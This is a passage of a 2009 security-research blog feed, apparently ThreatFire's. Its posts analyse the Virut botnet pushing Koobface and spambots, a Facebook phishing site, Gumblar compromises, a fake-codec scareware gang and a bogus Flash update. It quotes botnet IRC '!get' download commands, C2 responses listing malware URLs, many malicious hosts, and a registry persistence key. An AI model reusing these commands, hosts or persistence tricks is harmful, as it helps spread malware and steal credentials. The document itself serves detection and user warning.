The threat itself comes from a number of servers and delivers a variety of malware. We'll see that it is responsible for far more than infected files and IRC traffic, including adware, rootkits, password stealers, worms and spambots.&lt;br /&gt;&lt;br /&gt;Virut's current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of instances of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy, so that disinfection routines by the major AV vendors may end up corrupting the executable files that are meant to be cleaned when detected.&lt;br /&gt;&lt;br /&gt;DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE...&lt;br /&gt;&lt;br /&gt;The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:&lt;br /&gt;&lt;br /&gt;NICK xxx&lt;br /&gt;USER xxx. . :#xxx Service Pack 3&lt;br /&gt;JOIN #.xxx&lt;br /&gt;&lt;br /&gt;:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)&lt;br /&gt;:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (&lt;a href="http://www.threatexpert.com/report.aspx?md5=e8a03879d114dbaf7f796ed33e31d4a4" target="_blank"&gt;Koobface variant&lt;/a&gt;)&lt;br /&gt;:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves "load.exe" &lt;a href="http://www.threatexpert.com/report.aspx?md5=73a5de7137d746c42501f19584415657" target="_blank"&gt;malicious downloader&lt;/a&gt;)&lt;br /&gt;:u. PRIVMSG xxx:!get hxxp://85.114.131. 
69/ad2.exe (&lt;a href="http://www.threatexpert.com/report.aspx?md5=499f68191358c70fad6fb6126befb3fe" target="_blank"&gt;malicious ad-popper&lt;/a&gt;)&lt;br /&gt;PING :l.&lt;br /&gt;PONG :l.&lt;br /&gt;PING :l.&lt;br /&gt;PONG :l.&lt;br /&gt;&lt;br /&gt;Of those domains, it is interesting that "dl.guarddog2009.com" is actively serving Koobface worm variants and ad-poppers, considering that they are peddling scareware/rogueware from the same IP. Avoid it:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sh3Cmwxz1oI/AAAAAAAAA1Q/NuthaT7hKEE/s1600-h/dl.guarddog2009.com.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 226px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sh3Cmwxz1oI/AAAAAAAAA1Q/NuthaT7hKEE/s320/dl.guarddog2009.com.png" alt="" id="BLOGGER_PHOTO_ID_5340638704315913858" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Once running, these additional pieces of malware download other nastiness in the background:&lt;br /&gt;hxxp://avhtm.8866. org/files/av.htm (&lt;a href="http://www.threatexpert.com/report.aspx?md5=b699636fd417371ba34ae9545658f2c4" target="_blank"&gt;spambot dropper&lt;/a&gt;)&lt;br /&gt;a POST is sent to main15052009. com/achcheck.php&lt;br /&gt;hxxp://74.52.164. 210/pk/bb021908.exe (&lt;a href="http://www.threatexpert.com/report.aspx?md5=fd5c7c4623e7b4f314514d978c885edb" target="_blank"&gt;malicious downloader&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:&lt;br /&gt;#PID=xxx&lt;br /&gt;START|hxxp://www.i-site. 
ph/1/6244.exe (&lt;a href="http://www.threatexpert.com/report.aspx?md5=9f7bba0c5de7a66a958592e6fe6d6010" target="_blank"&gt;BHO dropper&lt;/a&gt;)&lt;br /&gt;START|hxxp://www.i-site. ph/1/nfr.exe (&lt;a href="http://www.threatexpert.com/report.aspx?md5=4bf2a453fce39e60262bcb9859f7bda9" target="_blank"&gt;proxy component&lt;/a&gt;)&lt;br /&gt;WAIT|120&lt;br /&gt;&lt;a href="http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html" target="_blank"&gt;#BLACKLABEL&lt;/a&gt;&lt;br /&gt;EXIT&lt;br /&gt;&lt;br /&gt;hxxp://ji-u. cn/506.exe  &lt;--  hxxp://goasi. cn/dll/abb.txt &lt;a href="http://www.threatexpert.com/report.aspx?md5=294d022a2c97342c24dbcc98527adc27" target="_blank"&gt;(renamed to reader_s.exe and run&lt;/a&gt;, an updated Virut backdoor variant)&lt;br /&gt;&lt;br /&gt;An unusual user-agent rears its head:&lt;br /&gt;GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)&lt;br /&gt;User-Agent: Download&lt;br /&gt;Host: 85.114.131.69&lt;br /&gt;Pragma: no-cache&lt;br /&gt;(Incidentally, 85.114.131.69 is the host for s2.zief. pl and dl.guarddog2009. com.)&lt;br /&gt;&lt;br /&gt;Additional files downloaded:&lt;br /&gt;hxxp://ipkipk.3322. org/ipk.exe  (&lt;a href="http://www.threatexpert.com/report.aspx?md5=9b5a63fda797bf1739f24a114b6e7419" target="_blank"&gt;downloader/adclick component&lt;/a&gt;)&lt;br /&gt;hxxp://xz.wanggui. com/mem322.exe (&lt;a href="http://www.threatexpert.com/report.aspx?md5=c5336fe6410a9a7fac06d3087f3340a7" target="_blank"&gt;downloader for password stealers&lt;/a&gt;)&lt;br /&gt;hxxp://www.dofulfill . 
net/loadersvc.exe&lt;br /&gt;&lt;br /&gt;All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.&lt;br /&gt;&lt;br /&gt;And then comes the spam. Infected machines spew spam containing messages like&lt;br /&gt;"If you don't feel like a complete person because you can't afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches."&lt;br /&gt;A link is included that takes you to a "group" at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like "trylamp. com". Often, other pieces of spam carry offers for pills of all kinds.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/Sh3VjSSr1_I/AAAAAAAAA1Y/ucP0YVgyTf4/s1600-h/spam_watches.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 146px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/Sh3VjSSr1_I/AAAAAAAAA1Y/ucP0YVgyTf4/s320/spam_watches.png" alt="" id="BLOGGER_PHOTO_ID_5340659535313623026" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-8203648336796177620?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/kpqGrantLDM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/8203648336796177620/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=8203648336796177620" title="0 Comments" /><link rel="edit" type="application/atom+xml" 
href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8203648336796177620" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8203648336796177620" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/kpqGrantLDM/virut-distributing-koobface-ad-clickers.html" title="Virut Distributing Koobface, Ad-Clickers and Spambots" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sh3Cmwxz1oI/AAAAAAAAA1Q/NuthaT7hKEE/s72-c/dl.guarddog2009.com.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/05/virut-distributing-koobface-ad-clickers.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-5346633804604555200</id><published>2009-05-21T12:29:00.000-07:00</published><updated>2009-05-22T11:33:28.209-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Password stealing" /><category scheme="http://www.blogger.com/atom/ns#" term="Crimeware" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">Brunga.at Facebook Phish</title><content type="html">While no product protects against absolutely everything, a couple of technical support people here had links sent from their friends to their Facebook account, telling them to check out "Brunga. at". 
(Do not visit this site right now to fill out login information; it will steal your credentials.)&lt;br /&gt;&lt;br /&gt;Subject: Dan Shmoo sent you a message on Facebook...&lt;br /&gt;Dan sent you a message.&lt;br /&gt;&lt;br /&gt;Subject: Hello&lt;br /&gt;"Check brunga.at"&lt;br /&gt;&lt;br /&gt;Screenshot of the site here; notice the blue banner missing the logo:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YaXoRZbsXc4/ShWsRFGhpYI/AAAAAAAAA1I/V-rL0pF-RXY/s1600-h/FacebookPhish.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 246px;" src="http://1.bp.blogspot.com/_YaXoRZbsXc4/ShWsRFGhpYI/AAAAAAAAA1I/V-rL0pF-RXY/s320/FacebookPhish.png" alt="" id="BLOGGER_PHOTO_ID_5338362342744892802" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After filling out authentication details, which are then stolen, the user is redirected to the real Facebook site.&lt;br /&gt;Use your head and always be aware of the site's URL when entering authentication/login info. Be careful of phishing attacks.&lt;br /&gt;&lt;br /&gt;Sorry, folks, ThreatFire doesn't protect you from phishing attempts like this one -- it wasn't designed to stop phish, and nothing at the software behavioral level looks malicious here. The times that we visited the active site, there was no malware delivered from brunga. However, there was an iframe at the bottom of the page redirecting the browser to a site that has been known to deliver LuckySploit exploit pages (updateserver. com, another site to avoid for now). 
Any successful LuckySploit attack is bound to deliver a barrage of various malware, recently including the banking password-stealer &lt;a href="http://www.threatexpert.com/report.aspx?md5=b592bd48dca17d54d5defff936ea0dda" target="_blank"&gt;Zbot&lt;/a&gt;, sophisticated spambots like Rustock, and various other custom-made &lt;a href="http://www.threatexpert.com/report.aspx?md5=95a2c43a986fda2cef6914a7ca994297" target="_blank"&gt;keyloggers&lt;/a&gt;. This specific server is busy, malicious, and it has been involved in &lt;a href="http://hphosts.blogspot.com/2009/05/livecom-poisoning-gumblarmartuz-isnt.html" target="_blank"&gt;Live.com poisoning&lt;/a&gt; too. On a daily basis, ThreatFire is preventing these malformed-PDF-based LuckySploit attacks in high numbers.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-5346633804604555200?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/yYx5LP671mE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/5346633804604555200/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=5346633804604555200" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/5346633804604555200" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/5346633804604555200" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/yYx5LP671mE/brungaat-facebook-phish.html" title="Brunga.at Facebook Phish" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty 
xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_YaXoRZbsXc4/ShWsRFGhpYI/AAAAAAAAA1I/V-rL0pF-RXY/s72-c/FacebookPhish.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/05/brungaat-facebook-phish.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-1771372810545928425</id><published>2009-05-20T11:22:00.001-07:00</published><updated>2009-05-21T09:03:27.226-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Spyware" /><category scheme="http://www.blogger.com/atom/ns#" term="Vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><title type="text">Gumblar Grumbling</title><content type="html">A couple of anti-malware firms have grumbled about the number of successful web site compromises a group has been making in order to inject malicious web pages into the victimized sites, and they refer to the threat as "&lt;a href="http://www.us-cert.gov/current/index.html#gumblar_malware_attack_circulating"&gt;Gumblar&lt;/a&gt;". The group is reportedly using stolen FTP credentials and possibly other configuration issues and vulnerabilities. These hijacked web sites in turn attack visiting users' web browsers with the goal of downloading and executing more &lt;a href="http://www.threatexpert.com/report.aspx?md5=29148682df9c5a693b35b2b4529925b2" target="_blank"&gt;malware&lt;/a&gt; hosted on a remote server. Originally the exploit/trojan/spyware hosting site was gumblar.cn; it was then changed to martuz.cn, and the domain will most likely change again.&lt;br /&gt;&lt;br /&gt;The large numbers in the news refer not to the trojan, or to the malware that was hosted on gumblar and martuz. 
The large numbers are detections of web pages that, however accurate the volume reporting may be, most likely are a part of hijacked web sites redirecting browsers to the exploits and &lt;a href="http://www.threatexpert.com/report.aspx?md5=29148682df9c5a693b35b2b4529925b2" target="_blank"&gt;trojans&lt;/a&gt; on the gumblar.cn and &lt;a href="http://www.threatexpert.com/report.aspx?md5=b0ca69853b371ec9eb58829e869f6f10"&gt;trojans&lt;/a&gt; on the martuz.cn domains.&lt;br /&gt;&lt;br /&gt;When a user doesn't patch their system for whatever reason, they may be maintaining known vulnerabilities in their software, which in turn are exploited when visiting a hijacked web presence. Following successful third party plugin exploitation, the delivered dropper is executed. The dropper uses an interesting technique to register loaded components for auto start on an unsuspecting user's system. Instead of the usual run key and service locations, this writer decided to abuse a user-mode auxiliary audio driver location that is loaded when Internet Explorer is started. This &lt;a href="http://www.threatexpert.com/report.aspx?md5=d8277aa17bcacc1b77c1df43f4c1feab" target="_blank"&gt;ThreatExpert report&lt;/a&gt; and &lt;a href="http://www.threatexpert.com/report.aspx?md5=2131112053ED144C46277B9024BCF39F" target="_blank"&gt;this one&lt;/a&gt; show an "Infostealer.Daonol/Trojan-Dropper.Win32.Agent.apfn/Troj/Daonol-Fam" trojan abusing the "Drivers32" key, much like the original gumblar variant:&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]&lt;br /&gt;aux = "%Temp%\..\doo.val"&lt;br /&gt;&lt;br /&gt;The group is not using any 0day attacks. Instead, they are sending down malformed .pdf and .swf files. 
It seems that enough reminders cannot be sent out about updating third party software:&lt;br /&gt;&lt;a href="http://blog.threatfire.com/2008/12/antivirus-360-distribution-update-third.html" target="_blank"&gt;Antivirus 360 Distribution - Update Third Party Plugins&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.threatfire.com/2009/03/pdf-reader-exploitation-2009.html" target="_blank"&gt;PDF Reader Exploitation 2009&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.threatfire.com/2009/03/pdf-reader-exploitation-2009-cont.html" target="_blank"&gt;Pdf Reader Exploitation 2009 (cont)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.threatfire.com/2008/11/rigged-pdf-files.html" target="_blank"&gt;Rigged pdf files&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.threatfire.com/2009/02/browser-securitymicrosoftcom-hosts-file.html" target="_blank"&gt;browser-security.microsoft.com Hosts File Modification&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We will post more data as it is gathered; the trojan itself is not in high prevalence in the ThreatFire community -- the attack has gotten far enough to launch the trojan on only a couple of systems, and it is prevented as "Spyware.Grumbler".&lt;br /&gt;&lt;br /&gt;In the meantime, be sure to update your favorite third party plugins, applications and your system software.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-1771372810545928425?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/WFYjZls3OSs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/1771372810545928425/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=1771372810545928425" title="0 Comments" /><link rel="edit" type="application/atom+xml" 
href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1771372810545928425" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/1771372810545928425" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/WFYjZls3OSs/gumblar-grumbling.html" title="Gumblar Grumbling" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/05/gumblar-grumbling.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-681723320400779000</id><published>2009-05-15T13:13:00.000-07:00</published><updated>2009-06-03T10:22:34.345-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">SoftwareForTubeview Codec Scheme's Continued Success</title><content type="html">A rogueware distribution gang known for their use of RBN services and &lt;a href="http://ddanchev.blogspot.com/2009/04/diverse-portfolio-of-fake-security.html" target="_blank"&gt;phishing scams&lt;/a&gt; continues to maintain a couple of the busiest servers in our daily prevented malware lists. Starting on May 6th, the group moved their downloaders and malware (with names similar to softwarefortubeview.4000.exe) from being served at 195.88.80.41 to exclusively 91.212.65.54.&lt;br /&gt;&lt;br /&gt;This group appears to be getting quite a bit of traction out of their ongoing FakeAv scheme, in addition to the phishing activities. 
They started out in late 2008 on 94.247.3.232 with tubeviewer.95.exe, and in mid-January moved tubeviewersetup..exe to several other addresses:&lt;br /&gt;216.195.40.88&lt;br /&gt;94.247.3.232&lt;br /&gt;91.211.64.131&lt;br /&gt;&lt;br /&gt;and since May 6th, they have served softwarefortubeview.40019.exe (among other names) at 91.212.65.54, for which we see multiple domain names registered.&lt;br /&gt;&lt;br /&gt;You can see our previous posts regarding their &lt;a href="http://blog.threatfire.com/2009/01/security-system-has-detected-spyware.html"&gt;FakeAv malware&lt;/a&gt; downloaders, with some of the most popular scareware messages: "you have a security problem" and "security system has detected spyware infection!".&lt;br /&gt;&lt;br /&gt;The redirection to this executable most often comes from blog posts offering free current movies, like "Watch Push Movie Online Free". You get what you pay for. Notice the video frame at the bottom of the post. 
Avoid this blog and others like it:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/ShCE7hm7RpI/AAAAAAAAA0o/zu0VC1W9LJ4/s1600-h/blog_redirects.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 302px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/ShCE7hm7RpI/AAAAAAAAA0o/zu0VC1W9LJ4/s320/blog_redirects.png" alt="" id="BLOGGER_PHOTO_ID_5336911716602824338" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;"Anika", the poster of the phony blog above, also set up a number of other blogs, hoping to capture more curious cats looking for "movie online free":&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YaXoRZbsXc4/ShCHfe8hoVI/AAAAAAAAA0w/TbyQP4GZSVE/s1600-h/anika_posts.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 247px;" src="http://1.bp.blogspot.com/_YaXoRZbsXc4/ShCHfe8hoVI/AAAAAAAAA0w/TbyQP4GZSVE/s320/anika_posts.png" alt="" id="BLOGGER_PHOTO_ID_5336914533386658130" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Eventually, clicking on the posts' link sets up the browser for a series of JavaScript redirections to "watch-for-free.net", where the phony executable is finally offered to watch the non-existent flick.&lt;br /&gt;For example, a few clicks for a "movie online free" Mr. 
Bean video link redirects the browser through several links, and eventually the fake video iframe coughs up the download prompt for the gang's malware:&lt;br /&gt;hxxp://watch-mr-bean-movie-online-free.blogspot.com/ --&gt;&lt;br /&gt;hxxp://video-trailers.net/hotnews.php?id=Mr._Bean --&gt;&lt;br /&gt;hxxp://watch-for-free.net/hotnews.php?id=Mr._Bean&amp;amp;was=1 --&gt;&lt;br /&gt;hxxp://premier-tube-site.com/xplay.php?id=40018&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/ShCOTJkjzII/AAAAAAAAA04/GMKPNSwpNy4/s1600-h/free_malware.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/ShCOTJkjzII/AAAAAAAAA04/GMKPNSwpNy4/s320/free_malware.png" alt="" id="BLOGGER_PHOTO_ID_5336922018071956610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Update: an excellent &lt;a href="http://ddanchev.blogspot.com/2009/05/gaztranzitstroyinfo-fake-russian-gas.html" target="_blank"&gt;post&lt;/a&gt; describing related activity and infrastructure at the &lt;b&gt;GazTranzitStroyInfo &lt;/b&gt;site and related Russian ISPs. 
And the group &lt;a href="http://blog.threatfire.com/2009/06/softwarefortubeview-moves-to-new-home.html" target="_blank"&gt;moves their malware&lt;/a&gt; to yet another provider.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-681723320400779000?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/PGl9QYVIc18" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/681723320400779000/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=681723320400779000" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/681723320400779000" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/681723320400779000" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/PGl9QYVIc18/softwarefortubeview-codec-schemes.html" title="SoftwareForTubeview Codec Scheme's Continued Success" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_YaXoRZbsXc4/ShCE7hm7RpI/AAAAAAAAA0o/zu0VC1W9LJ4/s72-c/blog_redirects.png" height="72" width="72" /><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/05/softwarefortubeview-codec-schemes.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-3737201483883728583</id><published>2009-05-12T11:52:00.000-07:00</published><updated>2009-05-12T15:39:39.717-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Social Engineering" /><category scheme="http://www.blogger.com/atom/ns#" term="IM Worm" /><category scheme="http://www.blogger.com/atom/ns#" term="Worm" /><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" /><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">Windows Security Center and Virus (I-Worm.Trojan.b)</title><content type="html">What is a virus i-worm trojan anyways? Well, it's not a legitimate detection with a valid CARO name; it's gibberish to lead a user to "Click 'Ok' to Install System Security Antivirus", either on XP:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YaXoRZbsXc4/SgnRzC5xz_I/AAAAAAAAA0I/4rIGJr5tKfI/s1600-h/confirm_xp.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 139px;" src="http://1.bp.blogspot.com/_YaXoRZbsXc4/SgnRzC5xz_I/AAAAAAAAA0I/4rIGJr5tKfI/s320/confirm_xp.png" alt="" id="BLOGGER_PHOTO_ID_5335025908479807474" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or with a sleeker look on Vista:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/SgnR9b4qbfI/AAAAAAAAA0Q/rOPnisRnbVQ/s1600-h/confirm_vista.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 144px;" 
src="http://3.bp.blogspot.com/_YaXoRZbsXc4/SgnR9b4qbfI/AAAAAAAAA0Q/rOPnisRnbVQ/s320/confirm_vista.png" alt="" id="BLOGGER_PHOTO_ID_5335026086984707570" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The distributors of System Security Antivirus, another rogueware or FakeAv product, are redirecting Turkish users to a site encouraging them to download the malware with a familiar scheme: "To watch this video you must have the Flash Player installed."&lt;br /&gt;It appears that the group is worming through Windows Live Messenger to attract downloads in increasing numbers. We'll be investigating it in depth and posting details here.&lt;br /&gt;&lt;br /&gt;The phony video page this time appears in Turkish, hosted on a Turkish server:&lt;br /&gt;"Flash Player version uyumsuzlugu:&lt;br /&gt;Tarayiciniz bu videoyu goruntuleyemiyor.&lt;br /&gt;Bu videoyu izleyebilmek icin Flash Player yaziliminizin guncel olmasi gerekiyor.&lt;br /&gt;Flash Player yaziliminizi guncellemek icin «Devam» butonuna tiklayiniz."&lt;br /&gt;(In English: "Flash Player version incompatibility: Your browser cannot display this video. To watch this video, your Flash Player software must be up to date. Click the «Continue» button to update your Flash Player software.")&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/SgnGoec1cXI/AAAAAAAAA0A/Fjcg1oOtrcU/s1600-h/BogusFlashPlayerUpdate.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 306px; height: 320px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/SgnGoec1cXI/AAAAAAAAA0A/Fjcg1oOtrcU/s320/BogusFlashPlayerUpdate.png" alt="" id="BLOGGER_PHOTO_ID_5335013632268136818" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The downloaded file, &lt;a href="http://www.threatexpert.com/report.aspx?md5=8dd43e91498b1fe68ef0c8aeb63336b4" target="_blank"&gt;flashplayerupdate_01.exe&lt;/a&gt;, drops and runs advhost.exe from system32 to perform the dirty work and injects adlaunch32.dll into all newly started applications.&lt;br /&gt;&lt;br /&gt;An interesting characteristic of the flashplayer_01 executable is 
its use of a spoofed, invalid digital signature, supposedly signed by Microsoft:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/SgnVATIFcjI/AAAAAAAAA0Y/Nz6szq7_l1Q/s1600-h/spoof_cert.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 262px; height: 320px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/SgnVATIFcjI/AAAAAAAAA0Y/Nz6szq7_l1Q/s320/spoof_cert.png" alt="" id="BLOGGER_PHOTO_ID_5335029434707964466" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Conveniently, the English version of the attacking web page is hosted on the same server:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sgn5UlBwhXI/AAAAAAAAA0g/7QMReWX-Szo/s1600-h/english_ver.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 283px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sgn5UlBwhXI/AAAAAAAAA0g/7QMReWX-Szo/s320/english_ver.png" alt="" 